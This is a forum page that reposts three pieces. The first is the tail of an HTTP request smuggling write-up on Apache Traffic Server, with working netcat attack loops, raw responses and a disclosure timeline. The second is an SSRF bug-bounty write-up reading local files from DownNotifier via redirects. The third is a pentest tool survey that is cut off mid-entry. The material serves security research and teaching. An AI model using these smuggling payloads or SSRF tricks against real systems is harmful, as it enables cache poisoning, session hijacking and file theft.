Instead of cache poisoning you could also play with the incomplete 1/2B query and wait for an innocent query to complete this request with the HTTP credentials of that user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning.

Run this attack:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'X-info: evil 1.5 query, bad CL header\r\n'\
'Content-Length :117\r\n'\
'\r\n'\
'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-info: evil poisoning query\r\n'\
'Dummy-unterminated:'\
|nc -q 1 8007
done

It should work; in this lab configuration Nginx adds an X-Location-echo header, echoing the first line of the query into the response headers.
This way we can observe that the second response replaces the real second query's first line with the hidden first line. In my case the last query's response contained:

X-Location-echo: /index.html?INJECTED=3

But this last query was GET /index.html?INJECTED=9.

You can check the cache content with:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 8007
done

In my case I found six regular 404s and three 200 responses (ouch): the cache is poisoned. If you want a deeper understanding of smuggling, you should play with Wireshark on this example. Do not forget to restart the cluster to empty the cache.

Here we have not played with a C query yet; the cache poisoning occurs on our A queries — unless you consider the /does-not-exists.html?cache='$i' requests to be C queries. But you can easily try to inject a real C query on this cluster, while Nginx has some waiting requests, and try to get it poisoned with the /index.html?INJECTED=3 responses:

for i in {1..9} ;do
printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 8007
done

This should give you a feel for real-world exploitation: you have to repeat the attack to obtain something. Vary the number of servers in the cluster and the pool settings on the various layers of reverse proxies, and things get complex. The easiest attack is to be a chaos generator (defacement-like, or DoS); fine-grained cache replacement of a chosen target, on the other hand, requires careful study and a bit of luck.

Does this work on port 8001, with HaProxy? Well, no, of course not: our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue to hide this bad request in a body. Or you would need a load balancer that does not detect this invalid syntax.
Note that in this example Nginx's behavior on invalid header syntax (ignoring it) is also non-standard (and won't be fixed, AFAIK). This invalid space-prefix problem is the same issue as Apache httpd's CVE-2016-8743.

HTTP Response Splitting: Content-Length Ignored on Cache Hit

Still there? Great! Because now comes the nicest issue. At least for me it was the nicest, mainly because I had spent a lot of time around it without understanding it.

I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce, I had failures, and successes on previously undetected issues, and back to step 1. When you cannot reproduce an issue, you start doubting that you ever saw it. Suddenly you find it again, but then no, etc. And of course I was not searching for the root cause in the right examples: I was, for instance, triggering tests on bad chunked transmissions, or delayed chunks. It took a very long (too long) time before I realized that all of this was linked to the cache hit/miss status of my requests.

On a cache hit, the Content-Length header of a GET query is not read. That is so easy when you know it...

And exploitation is also quite easy: we can hide a second query in the first query's body, and on a cache hit this body becomes a new query. This sort of query will get one response on the first launch (and yes, that is only one query); on a second launch it will render two responses (an HTTP request splitting, by definition):

01 GET /index.html?cache=zorg42 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-control: max-age=300\r\n
04 Content-Length: 71\r\n
05 \r\n
06 GET /index.html?cache=zorg43 HTTP/1.1\r\n
07 Host: dummy-host7.example.com\r\n
08 \r\n

Line 04 is ignored on a cache hit (so only after the first run); after that, line 06 is a new query and not just the first query's body.

This HTTP query is valid: THERE IS NO invalid HTTP syntax present. So it is quite easy to perform a successful, complete smuggling attack from this issue, even with HaProxy in front of ATS.
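The cache-hit bug can be modelled as two parsers disagreeing on where a message ends. A toy sketch (not ATS internals, just the framing logic; here we declare the exact byte length of the hidden query, 72 bytes, so the toy parser consumes it precisely) that splits a pipelined byte stream into requests, with and without honoring Content-Length on GET:

```python
def split_requests(stream: bytes, honor_content_length: bool):
    """Naively count the HTTP requests seen in a pipelined byte stream."""
    requests = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete request, stop
        body_len = 0
        if honor_content_length:
            for line in head.split(b"\r\n")[1:]:
                name, _, value = line.partition(b":")
                if name.strip().lower() == b"content-length":
                    body_len = int(value)
        requests.append(head)
        stream = rest[body_len:]  # skip the declared body
    return requests

payload = (
    b"GET /index.html?cache=zorg42 HTTP/1.1\r\n"
    b"Host: dummy-host7.example.com\r\n"
    b"Content-Length: 72\r\n\r\n"
    b"GET /index.html?cache=zorg43 HTTP/1.1\r\n"
    b"Host: dummy-host7.example.com\r\n\r\n"
)

# Cache miss: Content-Length is read -> one request (second query is body).
assert len(split_requests(payload, honor_content_length=True)) == 1
# Cache hit: Content-Length is ignored -> the body becomes a second request.
assert len(split_requests(payload, honor_content_length=False)) == 2
```

One byte stream, one request for a compliant parser, two requests for the cache-hit code path: that disagreement is the splitting primitive.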
If HaProxy is configured to use a keep-alive connection to ATS, we can fool HaProxy's HTTP stream by sending a pipeline of two queries where ATS sees three:

Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length]

Something       HaProxy           ATS             Nginx
    |--A----------->|               |               |
    |               |--A----------->|               |
    |               |               |--A----------->|
    |               |        [cache]<--A------------|
    | (etc.) <------|               |               |   warmup
    ---------------------------------------------------------
    |--A(+B)+C----->|               |               |   attack
    |               |--A(+B)+C----->|               |
    |               |           [HIT]               | * Bug *
    |               |<--A-----------| * B 'discovered' *
    |<--A-----------|               |               |
    |               |               |--B----------->|
    |               |               |<-B------------|
    |               |<-B------------|               |
[ouch]<-B-----------|               |               | * wrong resp. *
    |               |--C----------->|               |
    |               |<--C-----------|               |
  [R]<--C-----------|               |               | rejected

First, we need to init the cache; we use port 8001 to get the stream HaProxy->ATS->Nginx.

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 0\r\n'\
'\r\n'\
|nc -q 1 8001

You can run it twice and see that the second time it does not reach the Nginx access.log.

Then we attack HaProxy, or any other cache set in front of it. We use a pipeline of two queries; ATS will send back three responses. If a keep-alive mode is present in front of ATS, there is a security problem. That is the case here because we do not use option http-close on HaProxy (which would prevent the use of pipelines).

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 74\r\n'\
'\r\n'\
'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 8001

The query for /victim.html (which should be a 404 in our example) gets the response for /index.html (X-Location-echo: /index.html?evil=cogip2000).
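Again, the declared Content-Length must cover exactly the hidden query B. A sketch verifying the 74 bytes used in the attack above:

```python
# Hidden query B, fully terminated this time: it is a complete request,
# parsed as such by ATS on the cache hit.
hidden_b = (
    b"GET /index.html?evil=cogip2000 HTTP/1.1\r\n"
    b"Host: dummy-host7.example.com\r\n"
    b"\r\n"
)

# The Content-Length declared in query A must match this byte count.
assert len(hidden_b) == 74
```

With the declared length matching exactly, HaProxy sees A's body end right where C begins, while ATS (ignoring the header on a hit) parses B as its own request.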
HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:41 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?cache=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 12

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?evil=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Here the issue is critical, especially because there is no invalid syntax in the attacking query. We have an HTTP response splitting, which means two main impacts:

ATS may be used to poison or hurt an actor placed in front of it;
the second query is hidden (it is a body — binary garbage for an HTTP actor), so any security filter set in front of ATS cannot block it.

We could use that to hide a second layer of attack, like the ATS cache poisoning described in the other attacks. Now that you have a working lab, you can try embedding several layers of attacks...

That is what the "Drain the request body if there is a cache hit" fix is about.

To better understand the real-world impact: here, the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mixed C-request/B-response on HaProxy is not a direct threat. But if there is a cache in front of HaProxy, or if several chained ATS proxies are used...
Timeline

2017-12-26: Report to project maintainers
2018-01-08: Acknowledgment by project maintainers
2018-04-16: Version 7.1.3 with most of the fixes
2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all the fixes, plus some other CVE fixes)
2018-08-28: CVE announcement
2019-09-17: This article (yes, the URL date is wrong; the real date is September)

See also

Video Defcon 24: HTTP Smuggling
Defcon support
Video Defcon demos

Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
  19. 1 point
SSRF | Reading Local Files from DownNotifier server
Posted on September 18, 2019 by Leon

Hello guys, this is my first write-up and I would like to share it with the bug bounty community; it's an SSRF I found some months ago.

DownNotifier is an online tool to monitor website downtime. It sends an alert to a registered email, and by SMS, when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look at https://www.downnotifier.com. When I browsed the website, I noticed a text field for a URL, and an SSRF vulnerability quickly came to mind.

Getting XSPA

The first thing to do is add http: in the "Website URL" field. Select "When the site does not contain a specific text" and write some random text. I sent that request, and two emails arrived in my mailbox a few minutes later: the first alerting that a website is being monitored, and the second alerting that the website is down, but with the response inside an HTML file. And what is the response...?

Getting Local File Read

I was excited, but that's not enough to fetch very sensitive data, so I tried the same process with some URI schemes such as file, ldap, gopher, ftp, ssh, but it didn't work. I was thinking about how to bypass that filter, and remembered a write-up mentioning a bypass using a redirect with the Location header in a PHP file hosted on your own domain.

I hosted a PHP file with the above code and repeated the same process, registering a website to monitor. A few minutes later, an email arrived in the mailbox with an HTML file. And the response was...

I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support team, because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header.
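The redirect trick works because the target validates the scheme of the URL you submit, but then follows redirects returned by that URL. The hosted page only has to answer with a Location header pointing at a forbidden scheme. A minimal illustration in Python of what such a redirector returns (the original write-up used a PHP file; file:///etc/passwd is the classic target and is an assumption here, any internal URL works the same way):

```python
def redirect_response(target: str) -> bytes:
    """Raw HTTP response a tiny 'redirector' page would return.

    The monitoring service fetches our http:// URL (an allowed scheme),
    receives this 302, and follows it to the forbidden scheme itself.
    """
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {target}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode()

resp = redirect_response("file:///etc/passwd")
assert b"Location: file:///etc/passwd" in resp
```

Whether this works depends entirely on the fetching client following redirects across schemes, which is exactly the filter gap exploited here.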
Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
  20. 1 point
    Stuff Youtube Link : https://www.youtube.com/channel/UC3VydBGBl132baPCLeDspMQ
  21. 1 point
In the absence of a warning system, now in 2019, I would like to present a few links related to the topic of earthquakes. I hope I am not straying too far off topic, but it may be related somehow.

Useful links - web - seismic alerts:
1- https://web.telegram.org/#/im?p=@alertaCutremur
2- http://alerta.infp.ro/
3- https://twitter.com/earthbotro
4- https://twitter.com/incdfp
5- https://twitter.com/cutremurinfo
6- https://www.facebook.com/earthbotro
7- https://www.messenger.com/t/earthbotro

I also recommend installing browser extensions of the tab auto refresh kind.

Link to the National Institute for Earth Physics Research and Development: http://www.infp.ro/ or www.infp.ro/data/cam-image-320.jpg (requires F5 refresh)
Seismic Alert link: http://alerta.infp.ro/ or http://resyr.infp.ro/results.php
Romanian seismograph link:
Live recording of the MLR seismograph: http://www.mobotix.ro/camere_supraveghere_live_ro_928.html
Mobotix Live Streaming link: http://streaming.mobotixtools.com/live/5271f19a1048b

Since, now in 2019, the situation has evolved backwards and the two addresses above no longer work — never mind that the camera is a good, high-quality one worth 2000 dollars (M12D-Sec-DNight)... probably the whole populace is not supposed to see what that quality camera records, let's not even talk about it... off off off...

Other links / sources for viewing the Romanian seismograph: https://ecrantv.ro/3852/webcam-observatorul-seismic-muntele-rosu/ or www.infp.ro/data/cam-image-320.jpg or 92 87 22 214 ("those in the know, know").
  22. 1 point
  23. 1 point
Do you really think there are hosts in their right mind who would sell you, for $1, a VPS you could use to make $2 from mining? :)
  24. 1 point
Right now I would be tempted to stir things up with an expression like: "Wow, what he said to you — I wouldn't have allowed it." But come on, people, let's get along and stop bragging about what we have and what we do. We are all equal here, though in real life one person may be higher up than another. I came here to post my own projects and to learn something. I also got hate on my first posts, but I didn't give up and kept posting things in the meantime. On top of that, many of this forum's users, whether guests or registered members, rarely comment or vote.
  25. 1 point
Python is interpreted, so you can take a look at how JS is made. I think I saw a state machine example in JavaScript: The Good Parts.
  26. 1 point
A powerful little guide to dealing with Cross-Site Scripting in web application bug hunting and security assessments. Download link: https://www.pdfdrive.com/xss-cheat-sheet-d158319463.html
  27. 1 point
  28. 1 point
  29. 1 point
Man, I've been following this forum from the shadows for a while; I haven't posted. But how clueless can you guys be? Does your stupidity have no limits? What database, man — that one contained people from the '90s. 80% of the people in that database have died. All you dream about are FileList invites, codes, dorks and databases. You wouldn't do anything for your own future. There are people here who are Linux gurus, who know Python and other useful things, and you keep asking for databases.
  30. 1 point
I have added support for Windows x64, Linux x86 and Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  31. 1 point
32/64-bit versions. Sharing is caring. Download link: https://mega.nz/?fbclid=IwAR3DhN9QsjIrDsdGHq-HQPjh15ghzefhx28wUUBZ0UGdeTyfhmutezFclSQ#F!8xh1EIyI!5cZd5_e-LI4Akw7YVYoBNA
  32. 1 point
Pretty quiet around here
  33. 1 point
Hello. I have two Instagram accounts for sale!

1. Instagram account with over 4300 followers.
- All added manually.
- 100% Romanians.
- Gets around 400-1500 likes per post.
- The niche is comedy.
- You can turn it into your personal account.
- Price: 40 euro. I don't negotiate — this is the market price, plus I worked on it for a month... and most importantly, the followers were added manually.

2. Account with over 2500 followers.
- Added manually.
- 50% Romanians - 50% foreigners.
- Gets around 300 likes per post.
- Niche: Inna fans.
- Price: 15 euro.

If you buy both, I'll let them go for 50 euro. Link in PM
  34. 1 point
Sursa: https://m.habr.com/ru/company/dsec/blog/452836/

Digital Security Company Blog — Information Security, Network technologies — forkyforky, May 28

Web tools, or where should a pentester start?

We continue our series on useful tools for pentesters. In this new article we will look at tools for analyzing the security of web applications. Our colleague BeLove already did a similar selection about seven years ago. It is interesting to see which tools have retained and strengthened their positions, and which have faded into the background and are now rarely used. Note that Burp Suite also belongs here, but there will be a separate publication about it and its useful plugins.

Content:
Amass
Altdns
aquatone
MassDNS
nsec3map
Acunetix
Dirsearch
wfuzz
ffuf
gobuster
Arjun
LinkFinder
JSParser
sqlmap
NoSQLMap
oxml_xxe
tplmap
CeWL
Weakpass
AEM_hacker
JoomScan
WPScan

Amass

Amass is a Go tool for searching and enumerating DNS subdomains and mapping the external network. Amass is an OWASP project created to show how organizations on the Internet look to an outsider. Amass obtains subdomain names in various ways: it uses both recursive subdomain enumeration and open-source searches. To find connected network segments and autonomous system numbers, Amass uses the IP addresses obtained during operation. All the information found is used to build a map of the network.
Pros:

Information collection techniques include:
* DNS — dictionary enumeration of subdomains, subdomain brute force, "smart" enumeration using mutations based on the subdomains found, reverse DNS requests, and a search for DNS servers on which a zone transfer (AXFR) request is possible;
* Open-source search — Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo;
* TLS certificate database search — Censys, CertDB, CertSpotter, Crtsh, Entrust;
* Search engine APIs — BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan;
* Web archive search — ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback;
Integration with Maltego;
Provides the most complete coverage for the task of finding DNS subdomains.

Minuses:

Be careful with amass.netdomains — it will try to access each IP address in the identified infrastructure and obtain domain names from reverse DNS queries and TLS certificates. This is a "loud" technique and can reveal your reconnaissance activities to the organization under study.
High memory consumption — it can consume up to 2 GB of RAM with various settings, which will not allow you to run this tool in the cloud on a cheap VDS.

Altdns

Altdns is a Python tool for compiling dictionaries for brute-forcing DNS subdomains. It allows you to generate many subdomain variants using mutations and permutations. To do this, it uses words often found in subdomains (for example: test, dev, staging); all mutations and permutations are applied to the already-known subdomains given to Altdns as input. The output is a list of subdomain variants that may exist, and this list can later be used for DNS brute force.

Pros:

Works well with large data sets.
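The mutation idea behind Altdns is simple enough to sketch: take known subdomains and splice common words in as extra labels, prefixes, and suffixes. A rough illustration (the word list and the three mutation patterns are my assumptions for the sketch, not Altdns' exact algorithm):

```python
def mutate(known, words):
    """Generate candidate subdomains from known ones plus common words."""
    out = set()
    for host in known:
        label, _, parent = host.partition(".")
        for w in words:
            out.add(f"{w}.{host}")            # new label on top: w.api.example.com
            out.add(f"{w}-{label}.{parent}")  # prefixed label:   w-api.example.com
            out.add(f"{label}-{w}.{parent}")  # suffixed label:   api-w.example.com
    return out

cands = mutate(["api.example.com"], ["dev", "staging"])
assert "dev-api.example.com" in cands
assert "staging.api.example.com" in cands
```

The resulting candidate list is then fed to a resolver (MassDNS, for instance) to see which names actually exist.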
aquatone

aquatone was previously better known as yet another tool for finding subdomains, but the author himself abandoned that in favor of the aforementioned Amass. aquatone has now been rewritten in Go and is geared toward preliminary reconnaissance of websites. To do this, aquatone goes through the specified domains and searches for websites on different ports, after which it collects all the information about each site and takes a screenshot. Convenient for quick preliminary reconnaissance of websites, after which you can select priority targets for attacks.

Pros:

The output is a group of files and folders that are convenient for further work with other tools:
* An HTML report with the collected screenshots and response headers, grouped by similarity;
* A file with all the URLs on which websites were found;
* A file with statistics and page data;
* A folder with files containing the response headers from the found targets;
* A folder with files containing the response bodies from the found targets;
* Screenshots of the found websites;
Supports XML reports from Nmap and Masscan;
Uses headless Chrome/Chromium for rendering screenshots.

Minuses:

It may attract the attention of intrusion detection systems, and therefore requires tuning.

The screenshot was taken with one of the old versions of aquatone (v0.5.0), in which the search for DNS subdomains was still implemented. Older versions can be found on the releases page.

Screenshot: aquatone v0.5.0

MassDNS

MassDNS is another tool for finding DNS subdomains. Its main difference is that it makes DNS queries directly to many different DNS resolvers, and does so at considerable speed.

Pros:

Fast — able to resolve more than 350 thousand names per second.

Minuses:

MassDNS can cause a significant load on the DNS resolvers used, which can lead to bans on those servers or to complaints to your provider.
In addition, it will put a large load on the company's DNS servers, if they have any and if they are responsible for the domains you are trying to resolve.
The bundled list of resolvers is currently outdated, but if you filter out the broken DNS resolvers and add new known ones, everything will be fine.

nsec3map

nsec3map is a Python tool for getting a complete list of domains protected by DNSSEC.

Pros:

Quickly discovers hosts in DNS zones with a minimal number of queries, if DNSSEC support is enabled in the zone;
Includes a plugin for John the Ripper which can be used to crack the resulting NSEC3 hashes.

Minuses:

Many DNS errors are handled incorrectly;
There is no automatic parallelization of NSEC record processing — you have to split the namespace manually;
High memory consumption.

Acunetix

Acunetix is a web vulnerability scanner that automates the process of checking web application security. It tests the application for SQL injection, XSS, XXE, SSRF, and many other web vulnerabilities. However, like any other multi-vulnerability web scanner, it does not replace the pentester, since it cannot find complex chains of vulnerabilities or vulnerabilities in logic. But it covers a lot of different vulnerabilities, including various CVEs that the pentester might have forgotten about, so it is very convenient for getting rid of routine checks.

Pros:

Low level of false positives;
Results can be exported as reports;
Performs a large number of checks for different vulnerabilities;
Parallel scanning of multiple hosts.
Minuses:

There is no deduplication algorithm (Acunetix considers pages with identical functionality to be different, because different URLs lead to them), but the developers are working on it;
Requires installation on a separate web server, which complicates testing client systems over a VPN connection and using the scanner in an isolated segment of a client's local network;
It can be "noisy" toward the service under study, for example by sending too many attack vectors to the contact form on the site, thereby greatly disrupting business processes;
It is a proprietary and, accordingly, non-free solution.

Dirsearch

Dirsearch is a Python tool for brute-forcing directories and files on websites.

Pros:

It can distinguish real "200 OK" pages from "200 OK" pages that contain a "page not found" text;
Comes with a handy dictionary that has a good balance between size and search efficiency, containing standard paths typical of many CMSes and technology stacks;
Its own dictionary format, which allows good efficiency and flexibility in searching for files and directories;
Convenient output — plain text, JSON;
Able to do throttling — a pause between requests, which is vital for any weak service.

Minuses:

Extensions must be passed as a single string, which is inconvenient if you need to pass many extensions at once;
To use your own dictionary, it will need to be slightly adapted to the format of the Dirsearch dictionaries for maximum efficiency.

wfuzz

wfuzz is a Python web application fuzzer, probably one of the most famous web fuzzers. The principle is simple: wfuzz allows fuzzing any place in an HTTP request, which covers GET/POST parameters and HTTP headers, including Cookies and other authentication headers. At the same time, it is convenient for simple brute-forcing of directories and files, for which you need a good dictionary.
It also has a flexible filter system with which you can filter the responses from the website by different parameters, which allows you to achieve effective results.

Pros:

Multifunctional — modular structure, assembling a run takes a few minutes;
Convenient filtering and fuzzing mechanism;
You can fuzz any HTTP method, as well as any place in the HTTP request.

Minuses:

Still under development.

ffuf

ffuf is a web fuzzer in Go, created in the image of wfuzz. It allows brute-forcing files, directories, URL paths, names and values of GET/POST parameters, and HTTP headers, including the Host header for virtual host brute force. It differs from wfuzz in its higher speed and some new features; for example, dictionaries in the Dirsearch format are supported.

Pros:

Filters are similar to the wfuzz filters and allow flexible configuration of the brute force;
Allows fuzzing HTTP header values, data from POST requests, and various parts of the URL, including the names and values of GET parameters;
You can specify any HTTP method.

Minuses:

Still under development.

gobuster

gobuster is a Go tool for reconnaissance with two modes of operation. The first is used for brute-forcing files and directories on a website, the second for enumerating DNS subdomains. The tool does not support recursive enumeration of files and directories, which of course saves time, but on the other hand, the brute force of each newly found endpoint on the website needs to be launched separately.

Pros:

High speed, both for brute-forcing DNS subdomains and for brute-forcing files and directories.

Minuses:

The current version does not support setting HTTP headers;
By default, only some HTTP status codes (200, 204, 301, 302, 307) are considered valid.

Arjun

Arjun is a tool for brute-forcing hidden HTTP parameters in GET/POST parameters, as well as in JSON.
The built-in dictionary has 25,980 words, which Arjun checks in almost 30 seconds. The trick is that Arjun does not check each parameter separately; it checks ~1000 parameters at a time and looks to see whether the answer has changed. If the answer has changed, it divides those 1000 parameters into two parts and checks which of the parts affects the answer. Thus, using a simple binary search, it finds a parameter (or several hidden parameters) that influenced the answer and therefore may exist.

Pros:

High speed thanks to binary search;
Support for GET/POST parameters, as well as parameters in JSON;
The Burp Suite plugin param-miner works on the same principle and is also very good at finding hidden HTTP parameters. We will tell you more about it in the upcoming article about Burp and its plugins.

LinkFinder

LinkFinder is a Python script for searching for links in JavaScript files. Useful for finding hidden or forgotten endpoints/URLs in a web application.

Pros:

Fast;
There is a special Chrome plugin based on LinkFinder.

Minuses:

Inconvenient final output;
Does not analyze JavaScript dynamically;
Quite simple link-search logic — if the JavaScript is obfuscated in some way, or the links are initially missing and generated dynamically, it will not be able to find anything.

JSParser

JSParser is a Python script that uses Tornado and JSBeautifier to extract relative URLs from JavaScript files. Very useful for detecting AJAX requests and compiling a list of the API methods the application interacts with. Works effectively paired with LinkFinder.

Pros:

Fast parsing of JavaScript files.

sqlmap

sqlmap is probably one of the most well-known tools for analyzing web applications. sqlmap automates the search for and exploitation of SQL injections, works with several SQL dialects, and has a huge number of techniques in its arsenal, ranging from straight-up quote injection to complex vectors for time-based SQL injection.
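Returning to Arjun: the binary-search narrowing described above is worth sketching. Assume an oracle that tells us whether a response changed when a set of candidate parameters was sent together; halving the set isolates the influential parameter in O(log n) probes (the oracle here is a stub, not real HTTP — in the real tool each oracle call is one request):

```python
def find_param(candidates, response_changes):
    """Isolate one influential parameter by halving the candidate set.

    response_changes(params) -> True if sending these params together
    changes the response (one probe request in the real tool).
    """
    while len(candidates) > 1:
        half = candidates[: len(candidates) // 2]
        candidates = half if response_changes(half) else candidates[len(half):]
    return candidates[0] if response_changes(candidates) else None

# Stub oracle: the app secretly reacts to a hidden 'debug' parameter.
oracle = lambda params: "debug" in params

words = [f"param{i}" for i in range(1000)] + ["debug"]
assert find_param(words, oracle) == "debug"
```

Isolating one parameter among ~1000 costs roughly 10 probes instead of 1000, which is where the "30 seconds for 25,980 words" figure comes from.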
In addition, it has many post-exploitation techniques for various DBMSes, so it is useful not only as a scanner for SQL injections, but also as a powerful tool for exploiting SQL injections already found.

Pros:

A large number of different techniques and vectors;
Low number of false positives;
Many possibilities for fine tuning — various techniques, target database, tamper scripts for bypassing WAFs;
Ability to dump the output data;
Many different exploitation capabilities, for example, for some databases: automatic file upload/download, command execution (RCE), and others;
Support for direct connection to the database using the data obtained during the attack;
As input, you can submit a text file with Burp results — no need to manually compile all the command-line attributes.

Minuses:

It is difficult to customize, for example to write checks of your own, due to poor documentation on this;
Without the appropriate settings, it performs an incomplete set of checks, which can be misleading.

NoSQLMap

NoSQLMap is a Python tool for automating the search for and exploitation of NoSQL injection. It is convenient to use not only against NoSQL databases directly, but also when auditing web applications that use NoSQL.

Pros:

Like sqlmap, it not only finds a potential vulnerability, but also checks whether it can be exploited, for MongoDB and CouchDB.

Minuses:

Does not support NoSQL injection for Redis or Cassandra; work is in progress in this direction.

oxml_xxe

oxml_xxe is a tool for embedding XXE XML exploits into various file types that use the XML format in some form.

Pros:

It supports many common formats, such as DOCX, ODT, SVG, XML.

Minuses:

PDF, JPEG, and GIF are not fully supported;
Creates only one file. To solve this problem, you can use the docem tool, which can create a large number of files with payloads in different places.

The aforementioned utilities do an excellent job of XXE testing when documents containing XML are uploaded.
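The payload such tools embed is a plain external-entity declaration. A sketch of the classic XXE probe (the target file path is the usual illustrative choice, and the element names are arbitrary):

```python
def xxe_payload(path="file:///etc/passwd"):
    """Classic external-entity probe to embed in any XML a parser will read."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "{path}"> ]>\n'
        "<data>&xxe;</data>\n"
    )

p = xxe_payload()
assert "<!ENTITY xxe SYSTEM" in p
assert "&xxe;" in p
```

oxml_xxe's job is essentially to plant this kind of declaration inside the XML parts of DOCX/ODT/SVG containers, where a vulnerable parser will expand the entity.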
But do not forget that XML handlers occur in many other cases; for example, XML can be used as a data format instead of JSON. We therefore recommend paying attention to the following repository, which contains a large variety of payloads: PayloadsAllTheThings.

tplmap

tplmap is a Python tool for automatically detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities. Its settings and flags are similar to sqlmap's. It uses several different techniques and vectors, including blind injection, and also has techniques for executing code and uploading/downloading arbitrary files. In addition, it has in its arsenal techniques for a dozen different template engines, and some techniques for finding eval()-like code injections in Python, Ruby, PHP, and JavaScript. On successful exploitation, it opens an interactive console.

Pros:

A large number of different techniques and vectors;
Supports many template engines;
Many exploitation techniques.

CeWL

CeWL is a dictionary generator in Ruby, created to extract unique words from a specified website, following links on the website to a specified depth. The compiled dictionary of unique words can later be used for brute-forcing passwords on services, for brute-forcing files and directories on the same website, or for attacking hashes with hashcat or John the Ripper. Useful when compiling a "targeted" list of potential passwords.

Pros:

Easy to use.

Minuses:

You need to be careful with the search depth, so as not to capture an extra domain.

Weakpass

Weakpass is a service containing many dictionaries with unique passwords. It is extremely useful for various tasks related to password cracking, ranging from simple online brute-forcing of accounts on target services to offline brute-forcing of hashes obtained using hashcat or John The Ripper. There are about 8 billion passwords of 4 to 25 characters in length.
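CeWL's core idea — harvest the unique words from a page's visible text to build a targeted wordlist — fits in a few lines of stdlib Python. A sketch (the minimum word length of 4 and the sample HTML are my assumptions, not a real crawl):

```python
from html.parser import HTMLParser
import re

class WordHarvester(HTMLParser):
    """Collect unique words from the text content of an HTML page."""
    def __init__(self, min_len=4):
        super().__init__()
        self.min_len = min_len
        self.words = set()

    def handle_data(self, data):
        # Only text nodes reach handle_data; tags and attributes are skipped.
        for w in re.findall(r"[A-Za-z]+", data):
            if len(w) >= self.min_len:
                self.words.add(w.lower())

h = WordHarvester()
h.feed("<html><body><h1>Cogip intranet</h1><p>Staff portal login</p></body></html>")
assert {"cogip", "intranet", "staff", "portal", "login"} <= h.words
```

The real tool adds crawling to a given depth and metadata extraction; the harvested words then seed password or path brute force against the same target.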
Pros:
- Contains both specialized dictionaries and dictionaries of the most common passwords, so you can pick one that fits your needs;
- The dictionaries are updated and extended with new passwords;
- The dictionaries are sorted by effectiveness: you can pick one for a quick online brute-force as well as for a thorough offline run against an extensive dictionary built from recent leaks;
- There is a calculator that estimates how long a brute-force run would take on your hardware.

As a separate group, we would like to highlight tools for checking CMSs: WPScan, JoomScan, and AEM hacker.

AEM hacker

AEM hacker is a tool for detecting vulnerabilities in Adobe Experience Manager (AEM) applications.

Pros:
- Can detect AEM applications from a list of URLs supplied as input;
- Contains scripts for obtaining RCE by uploading a JSP shell or via SSRF.

JoomScan

JoomScan is a Perl tool to automate the detection of vulnerabilities in Joomla CMS deployments.

Pros:
